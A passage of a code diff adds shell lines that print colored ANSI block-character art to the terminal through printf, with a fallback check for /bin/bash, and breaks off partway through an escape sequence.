+ \e[48;5;71m \e[48;5;232m\e[38;5;65m▄\e[48;5;64m\e[38;5;233m▄\e[48;5;76m \e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m \e[48;5;0m\e[38;5;70m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;70m▄\e[48;5;76m \e[38;5;77m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;236m \e[48;5;237m\e[38;5;238m▄\e[48;5;234m\e[38;5;235m▄\e[0m
+ \e[48;5;71m \e[48;5;235m\e[38;5;71m▄\e[48;5;64m\e[38;5;232m▄\e[48;5;76m \e[48;5;77m\e[38;5;76m▄\e[48;5;107m\e[38;5;77m▄\e[48;5;107m \e[38;5;77m▄\e[48;5;77m \e[48;5;76m \e[48;5;107m\e[38;5;77m▄\e[48;5;107m \e[48;5;71m\e[38;5;77m▄\e[48;5;76m \e[48;5;64m \e[48;5;236m\e[38;5;237m▄\e[48;5;237m\e[38;5;234m▄\e[0m
+ \e[48;5;71m \e[48;5;232m\e[38;5;239m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m \e[48;5;70m\e[38;5;64m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m
+ \e[48;5;71m \e[48;5;237m\e[38;5;71m▄\e[48;5;232m\e[38;5;235m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m \e[48;5;70m\e[38;5;236m▄\e[48;5;236m \e[48;5;237m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m
+ \e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[48;5;236m\e[38;5;71m▄\e[48;5;232m\e[38;5;65m▄\e[48;5;70m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m \e[38;5;22m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;70m\e[38;5;236m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m\e[38;5;233m▄\e[0m
+ \e[38;5;233m▀\e[48;5;71m\e[38;5;232m▄\e[48;5;71m \e[48;5;236m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;2m\e[38;5;235m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m \e[38;5;77m▄\e[48;5;76m\e[38;5;236m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;22m\e[38;5;238m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m \e[0m
+ \e[48;5;65m\e[38;5;238m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m \e[48;5;235m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;238m▄\e[48;5;65m\e[38;5;234m▄\e[48;5;70m\e[38;5;232m▄\e[48;5;77m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;235m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;237m▄\e[0m
+ \e[38;5;232m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m \e[48;5;65m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m \e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;234m▀\e[38;5;239m▀\e[0m
+ \e[38;5;234m▀\e[38;5;236m▀\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;65m\e[38;5;243m▄\e[0m\e[38;5;233m▀\e[38;5;235m▀\e[0m
+ \e[38;5;242m▀\e[38;5;233m▀\e[38;5;232m▀\e[38;5;234m▀\e[38;5;236m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;65m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;237m▄\e[48;5;237m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;232m▀\e[38;5;232m▀\e[38;5;59m▀\e[0m
+'";
+ else
+ if [ -f "/bin/bash" ]; then
+ /bin/bash -c "printf '
+ \e[38;2;26;43;21m▄\e[38;2;58;91;50m▄\e[48;2;116;117;116m\e[38;2;68;119;56m▄\e[48;2;98;98;98m\e[38;2;86;143;70m▄\e[48;2;98;98;98m\e[38;2;100;153;87m▄\e[48;2;63;65;63m\e[38;2;102;164;86m▄\e[48;2;46;49;44m\e[38;2;98;168;79m▄\e[48;2;43;45;43m\e[38;2;91;155;75m▄\e[48;2;61;62;61m\e[38;2;78;137;63m▄\e[48;2;102;101;102m\e[38;2;64;112;52m▄\e[0m\e[38;2;38;67;32m▄\e[38;2;20;35;16m▄\e[38;2;10;20;8m▄\e[38;2;15;21;13m▄\e[0m
+ \e[38;2;49;80;41m▄\e[38;2;73;133;59m▄\e[48;2;20;21;20m\e[38;2;91;163;72m▄\e[48;2;14;27;12m\e[38;2;96;174;76m▄\e[48;2;51;92;41m\e[38;2;98;177;78m▄\e[48;2;86;155;68m\e[38;2;98;177;78m▄\e[48;2;96;173;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;97;175;76m\e[38;2;98;177;78m▄\e[48;2;93;168;74m\e[38;2;98;177;78m▄\e[48;2;99;163;83m\e[38;2;97;177;77m▄\e[48;2;99;151;86m\e[38;2;98;177;78m▄\e[48;2;35;57;29m\e[38;2;98;176;78m▄\e[48;2;19;21;19m\e[38;2;94;169;75m▄\e[0m\e[38;2;70;125;56m▄\e[0m
+ \e[38;2;42;65;36m▄\e[38;2;62;106;52m▄\e[48;2;94;95;94m\e[38;2;86;152;70m▄\e[48;2;57;72;53m\e[38;2;96;174;77m▄\e[48;2;57;96;47m\e[38;2;98;177;78m▄\e[48;2;78;136;62m\e[38;2;98;177;78m▄\e[48;2;95;167;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;77m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m\e[38;2;76;137;60m▄\e[48;2;98;177;78m\e[38;2;54;97;42m▄\e[48;2;99;179;79m\e[38;2;39;71;30m▄\e[48;2;100;181;79m\e[38;2;35;60;30m▄\e[48;2;101;181;81m\e[38;2;42;66;37m▄\e[48;2;100;177;80m\e[38;2;52;73;45m▄\e[48;2;95;175;76m\e[38;2;47;75;40m▄\e[48;2;94;178;73m\e[38;2;41;75;33m▄\e[48;2;98;179;78m\e[38;2;42;73;34m▄\e[48;2;99;180;79m\e[38;2;40;70;33m▄\e[48;2;99;179;78m\e[38;2;44;75;36m▄\e[48;2;97;177;77m\e[38;2;55;93;46m▄\e[48;2;97;176;77m\e[38;2;65;113;52m▄\e[48;2;98;177;78m\e[38;2;79;141;63m▄\e[48;2;98;177;78m\e[38;2;93;166;75m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;94;170;75m\e[38;2;98;177;78m▄\e[48;2;71;128;56m\e[38;2;98;177;78m▄\e[48;2;34;56;28m\e[38;2;97;175;77m▄\e[48;2;64;66;64m\e[38;2;78;140;62m▄\e[0m
+ \e[48;2;66;112;54m\e[38;2;98;177;78m▄\e[48;2;80;133;66m\e[38;2;98;177;78m▄\e[48;2;95;162;76m\e[38;2;98;177;78m▄\e[48;2;96;171;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m\e[38;2;96;174;76m▄\e[48;2;98;177;78m\e[38;2;74;130;59m▄\e[48;2;98;176;78m\e[38;2;32;49;27m▄\e[48;2;95;166;76m\e[38;2;18;29;15m▄\e[48;2;73;126;59m\e[38;2;65;113;53m▄\e[48;2;40;62;34m\e[38;2;107;209;83m▄\e[48;2;23;43;19m\e[38;2;77;220;42m▄\e[48;2;32;72;22m\e[38;2;72;218;36m▄\e[48;2;55;155;30m\e[38;2;73;217;37m▄\e[48;2;71;203;38m\e[38;2;73;217;37m▄\e[48;2;79;212;46m\e[38;2;73;218;37m▄\e[48;2;81;216;48m\e[38;2;73;218;37m▄\e[48;2;82;220;48m\e[38;2;73;218;37m▄\e[48;2;79;221;44m\e[38;2;73;218;37m▄\e[48;2;76;219;40m\e[38;2;73;218;37m▄\e[48;2;76;218;40m\e[38;2;73;218;37m▄\e[48;2;75;213;41m\e[38;2;73;218;37m▄\e[48;2;79;203;48m\e[38;2;73;218;37m▄\e[48;2;76;175;52m\e[38;2;73;218;37m▄\e[48;2;52;127;33m\e[38;2;73;218;37m▄\e[48;2;29;75;18m\e[38;2;73;217;37m▄\e[48;2;19;45;12m\e[38;2;73;218;36m▄\e[48;2;45;74;38m\e[38;2;65;196;33m▄\e[48;2;76;127;62m\e[38;2;44;132;24m▄\e[48;2;90;158;72m\e[38;2;16;45;10m▄\e[48;2;97;175;77m\e[38;2;28;50;22m▄\e[48;2;98;177;78m\e[38;2;80;145;64m▄\e[48;2;98;177;78m\e[38;2;97;175;77m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;97;173;78m\e[38;2;98;177;78m▄\e[48;2;69;114;56m\e[38;2;98;177;78m▄\e[48;2;30;38;28m\e[38;2;103;179;83m▄\e[0m\e[38;2;99;149;87m▄\e[0m
+ \e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;83;150;66m▄\e[48;2;98;177;78m\e[38;2;44;80;34m▄\e[48;2;99;179;78m\e[38;2;33;49;28m▄\e[48;2;87;159;69m\e[38;2;68;97;61m▄\e[48;2;46;84;37m\e[38;2;87;165;68m▄\e[48;2;25;37;21m\e[38;2;83;208;52m▄\e[48;2;59;131;42m\e[38;2;73;219;37m▄\e[48;2;74;199;43m\e[38;2;74;223;37m▄\e[48;2;72;213;38m\e[38;2;67;204;35m▄\e[48;2;73;218;37m\e[38;2;55;171;29m▄\e[48;2;72;218;36m\e[38;2;59;136;22m▄\e[48;2;72;218;36m\e[38;2;103;132;15m▄\e[48;2;73;219;37m\e[38;2;149;133;9m▄\e[48;2;72;220;37m\e[38;2;168;130;7m▄\e[48;2;73;220;37m\e[38;2;167;118;5m▄\e[48;2;72;218;37m\e[38;2;106;78;4m▄\e[48;2;69;210;36m\e[38;2;93;69;4m▄\e[48;2;66;199;34m\e[38;2;173;117;4m▄\e[48;2;63;192;32m\e[38;2;177;119;4m▄\e[48;2;62;186;32m\e[38;2;173;116;4m▄\e[48;2;61;186;31m\e[38;2;176;115;4m▄\e[48;2;63;191;32m\e[38;2;174;115;4m▄\e[48;2;67;202;34m\e[38;2;170;113;4m▄\e[48;2;70;213;36m\e[38;2;180;118;3m▄\e[48;2;72;219;37m\e[38;2;175;117;4m▄\e[48;2;73;220;37m\e[38;2;154;120;7m▄\e[48;2;73;220;37m\e[38;2;80;94;11m▄\e[48;2;73;219;37m\e[38;2;48;93;15m▄\e[48;2;73;218;37m\e[38;2;41;112;19m▄\e[48;2;72;215;36m\e[38;2;45;144;25m▄\e[48;2;64;192;32m\e[38;2;63;191;32m▄\e[48;2;32;99;16m\e[38;2;73;218;37m▄\e[48;2;21;41;16m\e[38;2;72;210;38m▄\e[48;2;38;66;30m\e[38;2;67;177;41m▄\e[48;2;79;141;63m\e[38;2;53;123;36m▄\e[48;2;98;178;78m\e[38;2;32;57;25m▄\e[48;2;98;179;77m\e[38;2;25;46;20m▄\e[48;2;97;177;77m\e[38;2;56;100;46m▄\e[48;2;98;177;78m\e[38;2;93;165;75m▄\e[48;2;97;176;77m\e[38;2;100;181;80m▄\e[48;2;98;177;77m\e[38;2;97;176;76m▄\e[48;2;97;176;78m\e[38;2;98;177;78m▄\e[48;2;99;174;79m\e[38;2;98;177;78m▄\e[0m
+ \e[48;2;98;178;78m\e[38;2;46;76;38m▄\e[48;2;100;178;80m\e[38;2;50;69;45m▄\e[48;2;99;176;80m\e[38;2;35;46;33m▄\e[48;2;82;148;65m\e[38;2;7;9;6m▄\e[48;2;64;117;50m\e[38;2;35;54;30m▄\e[48;2;42;77;34m\e[38;2;52;107;39m▄\e[48;2;26;46;21m\e[38;2;80;194;52m▄\e[48;2;34;71;26m\e[38;2;73;216;38m▄\e[48;2;54;133;35m\e[38;2;67;192;32m▄\e[48;2;81;199;52m\e[38;2;81;158;23m▄\e[48;2;80;218;46m\e[38;2;100;110;11m▄\e[48;2;66;199;33m\e[38;2;152;98;2m▄\e[48;2;60;157;26m\e[38;2;220;129;1m▄\e[48;2;80;128;18m\e[38;2;251;145;0m▄\e[48;2;120;110;9m\e[38;2;255;147;0m▄\e[48;2;154;106;4m\e[38;2;255;147;0m▄\e[48;2;181;114;2m\e[38;2;255;147;0m▄\e[48;2;230;134;0m\e[38;2;255;147;0m▄\e[48;2;251;144;0m\e[38;2;255;147;0m▄\e[48;2;254;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;163;94;0m\e[38;2;134;78;0m▄\e[48;2;2;1;0m\e[38;2;58;33;0m▄\e[48;2;13;7;0m\e[38;2;133;76;0m▄\e[48;2;64;38;0m\e[38;2;12;7;0m▄\e[48;2;250;144;0m\e[38;2;234;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;146;0m\e[38;2;255;147;0m▄\e[48;2;239;143;2m\e[38;2;255;147;0m▄\e[48;2;223;131;1m\e[38;2;255;147;0m▄\e[48;2;192;120;2m\e[38;2;255;147;0m▄\e[48;2;130;96;5m\e[38;2;255;147;0m▄\e[48;2;82;88;9m\e[38;2;255;148;0m▄\e[48;2;62;104;15m\e[38;2;247;147;1m▄\e[48;2;49;132;22m\e[38;2;212;134;3m▄\e[48;2;57;165;32m\e[38;2;144;95;3m▄\e[48;2;53;117;38m\e[38;2;74;61;8m▄\e[48;2;50;97;39m\e[38;2;47;60;21m▄\e[48;2;35;56;29m\e[38;2;47;81;33m▄\e[48;2;17;22;15m\e[38;2;20;34;19m▄\e[48;2;31;50;26m\e[38;2;48;73;42m▄\e[48;2;55;90;47m\e[38;2;37;56;33m▄\e[48;2;78;132;64m\e[38;2;21;31;18m▄\e[48;2;95;167;78m\e[38;2;18;26;16m▄\e[0m
+ \e[48;2;48;74;43m\e[38;2;51;78;45m▄\e[48;2;48;74;43m\e[38;2;50;76;44m▄\e[48;2;46;71;42m\e[38;2;12;17;11m▄\e[48;2;32;54;28m\e[38;2;45;93;35m▄\e[48;2;58;112;46m\e[38;2;26;45;17m▄\e[48;2;55;130;37m\e[38;2;121;83;5m▄\e[48;2;57;133;27m\e[38;2;232;138;0m▄\e[48;2;101;96;8m\e[38;2;253;146;0m▄\e[48;2;200;118;1m\e[38;2;254;147;0m▄\e[48;2;248;144;0m\e[38;2;255;147;0m▄\e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;173;100;0m\e[38;2;210;122;0m▄\e[48;2;172;100;0m\e[38;2;76;44;0m▄\e[48;2;214;123;0m\e[38;2;153;88;0m▄\e[48;2;36;21;0m\e[38;2;162;94;0m▄\e[48;2;201;116;0m\e[38;2;20;12;0m▄\e[48;2;254;147;0m\e[38;2;238;137;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;241;143;1m\e[38;2;255;147;0m▄\e[48;2;213;125;0m\e[38;2;255;147;0m▄\e[48;2;117;73;3m\e[38;2;252;147;1m▄\e[48;2;25;36;21m\e[38;2;94;69;18m▄\e[48;2;50;77;44m\e[38;2;39;59;33m▄\e[48;2;51;78;45m \e[48;2;51;78;44m\e[38;2;51;78;45m▄\e[0m
+ \e[48;2;51;78;45m\e[38;2;50;76;44m▄\e[48;2;40;58;34m\e[38;2;43;36;13m▄\e[48;2;38;37;6m\e[38;2;240;143;2m▄\e[48;2;149;95;6m\e[38;2;254;147;0m▄\e[48;2;226;134;1m\e[38;2;255;147;0m▄\e[48;2;253;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;243;140;0m▄\e[48;2;116;67;0m\e[38;2;90;52;0m▄\e[48;2;237;137;0m\e[38;2;254;147;0m▄\e[48;2;248;143;0m\e[38;2;255;147;0m▄\e[48;2;250;144;0m\e[38;2;255;147;0m▄\e[48;2;45;25;0m\e[38;2;191;110;0m▄\e[48;2;64;36;0m\e[38;2;32;18;0m▄\e[48;2;245;141;0m\e[38;2;152;87;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;230;140;6m\e[38;2;254;147;0m▄\e[48;2;25;21;7m\e[38;2;143;86;2m▄\e[48;2;48;74;42m\e[38;2;39;60;34m▄\e[48;2;51;78;45m \e[0m
+ \e[48;2;41;63;37m\e[38;2;40;47;23m▄\e[48;2;119;70;1m\e[38;2;230;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;180;104;0m\e[38;2;120;68;0m▄\e[48;2;135;78;0m\e[38;2;158;91;0m▄\e[48;2;255;147;0m\e[38;2;250;145;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;146;0m▄\e[48;2;252;145;0m\e[38;2;209;120;0m▄\e[48;2;54;31;0m\e[38;2;61;35;0m▄\e[48;2;94;54;0m\e[38;2;159;91;0m▄\e[48;2;254;146;0m\e[38;2;244;140;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;240;144;1m\e[38;2;255;147;0m▄\e[48;2;36;40;18m\e[38;2;70;49;6m▄\e[48;2;50;78;45m\e[38;2;45;69;40m▄\e[0m
+ \e[48;2;65;48;9m\e[38;2;98;64;6m▄\e[48;2;255;149;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;254;146;0m▄\e[48;2;225;130;0m\e[38;2;175;100;0m▄\e[48;2;210;120;0m\e[38;2;253;146;0m▄\e[48;2;209;121;0m\e[38;2;254;147;0m▄\e[48;2;86;49;0m\e[38;2;189;109;0m▄\e[48;2;254;146;0m\e[38;2;142;81;0m▄\e[48;2;255;147;0m\e[38;2;102;59;0m▄\e[48;2;199;115;0m\e[38;2;69;40;0m▄\e[48;2;244;141;0m\e[38;2;238;138;0m▄\e[48;2;253;146;0m\e[38;2;184;105;0m▄\e[48;2;200;115;0m\e[38;2;231;134;0m▄\e[48;2;253;147;0m\e[38;2;254;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;149;98;7m\e[38;2;215;132;5m▄\e[48;2;35;54;32m\e[38;2;31;42;22m▄\e[0m
+ \e[48;2;133;82;3m\e[38;2;153;89;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;248;147;0m▄\e[48;2;254;147;0m\e[38;2;242;142;0m▄\e[48;2;204;116;0m\e[38;2;224;131;0m▄\e[48;2;200;115;0m\e[38;2;205;124;1m▄\e[48;2;199;115;0m\e[38;2;175;109;2m▄\e[48;2;172;100;0m\e[38;2;157;102;2m▄\e[48;2;168;97;0m\e[38;2;172;114;3m▄\e[48;2;206;119;0m\e[38;2;156;115;5m▄\e[48;2;215;125;0m\e[38;2;138;111;7m▄\e[48;2;180;105;0m\e[38;2;121;105;8m▄\e[48;2;233;136;0m\e[38;2;120;109;8m▄\e[48;2;254;148;0m\e[38;2;116;111;9m▄\e[48;2;254;148;0m\e[38;2;112;111;10m▄\e[48;2;255;148;0m\e[38;2;130;121;10m▄\e[48;2;254;148;0m\e[38;2;103;105;10m▄\e[48;2;254;148;0m\e[38;2;99;99;9m▄\e[48;2;254;148;0m\e[38;2;106;98;8m▄\e[48;2;254;148;0m\e[38;2;106;96;8m▄\e[48;2;255;148;0m\e[38;2;118;98;7m▄\e[48;2;255;147;0m\e[38;2;123;101;7m▄\e[48;2;255;147;0m\e[38;2;129;99;6m▄\e[48;2;255;147;0m\e[38;2;141;100;5m▄\e[48;2;255;147;0m\e[38;2;166;111;4m▄\e[48;2;255;147;0m\e[38;2;189;122;4m▄\e[48;2;255;147;0m\e[38;2;217;131;1m▄\e[48;2;255;147;0m\e[38;2;248;145;0m▄\e[48;2;255;147;0m\e[38;2;250;148;0m▄\e[48;2;255;147;0m\e[38;2;254;149;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;147;1m\e[38;2;254;147;0m▄\e[48;2;47;44;15m\e[38;2;81;54;7m▄\e[0m
+ \e[48;2;163;95;0m\e[38;2;176;103;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;147;0m▄\e[48;2;255;147;0m\e[38;2;250;144;0m▄\e[48;2;255;147;0m\e[38;2;238;146;1m▄\e[48;2;254;147;0m\e[38;2;170;117;4m▄\e[48;2;252;147;0m\e[38;2;78;65;5m▄\e[48;2;239;144;1m\e[38;2;36;71;11m▄\e[48;2;220;136;2m\e[38;2;41;122;21m▄\e[48;2;193;124;2m\e[38;2;59;179;31m▄\e[48;2;178;119;4m\e[38;2;69;210;35m▄\e[48;2;129;104;6m\e[38;2;73;219;37m▄\e[48;2;67;87;10m\e[38;2;73;219;37m▄\e[48;2;61;106;15m\e[38;2;73;218;37m▄\e[48;2;52;126;21m\e[38;2;73;218;37m▄\e[48;2;52;150;25m\e[38;2;73;218;37m▄\e[48;2;58;177;30m\e[38;2;73;218;37m▄\e[48;2;63;194;33m\e[38;2;73;218;37m▄\e[48;2;66;204;34m\e[38;2;73;218;37m▄\e[48;2;69;212;36m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;72;219;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;219;37m\e[38;2;73;218;37m▄\e[48;2;72;214;36m\e[38;2;73;218;37m▄\e[48;2;68;207;35m\e[38;2;73;218;37m▄\e[48;2;65;197;34m\e[38;2;73;218;37m▄\e[48;2;61;185;32m\e[38;2;73;218;37m▄\e[48;2;51;157;27m\e[38;2;73;218;37m▄\e[48;2;41;125;21m\e[38;2;73;218;37m▄\e[48;2;40;106;18m\e[38;2;73;218;37m▄\e[48;2;75;92;10m\e[38;2;73;218;37m▄\e[48;2;76;85;10m\e[38;2;73;219;37m▄\e[48;2;112;94;7m\e[38;2;72;216;36m▄\e[48;2;162;113;5m\e[38;2;64;194;33m▄\e[48;2;219;131;0m\e[38;2;50;152;26m▄\e[48;2;231;138;1m\e[38;2;30;65;14m▄\e[4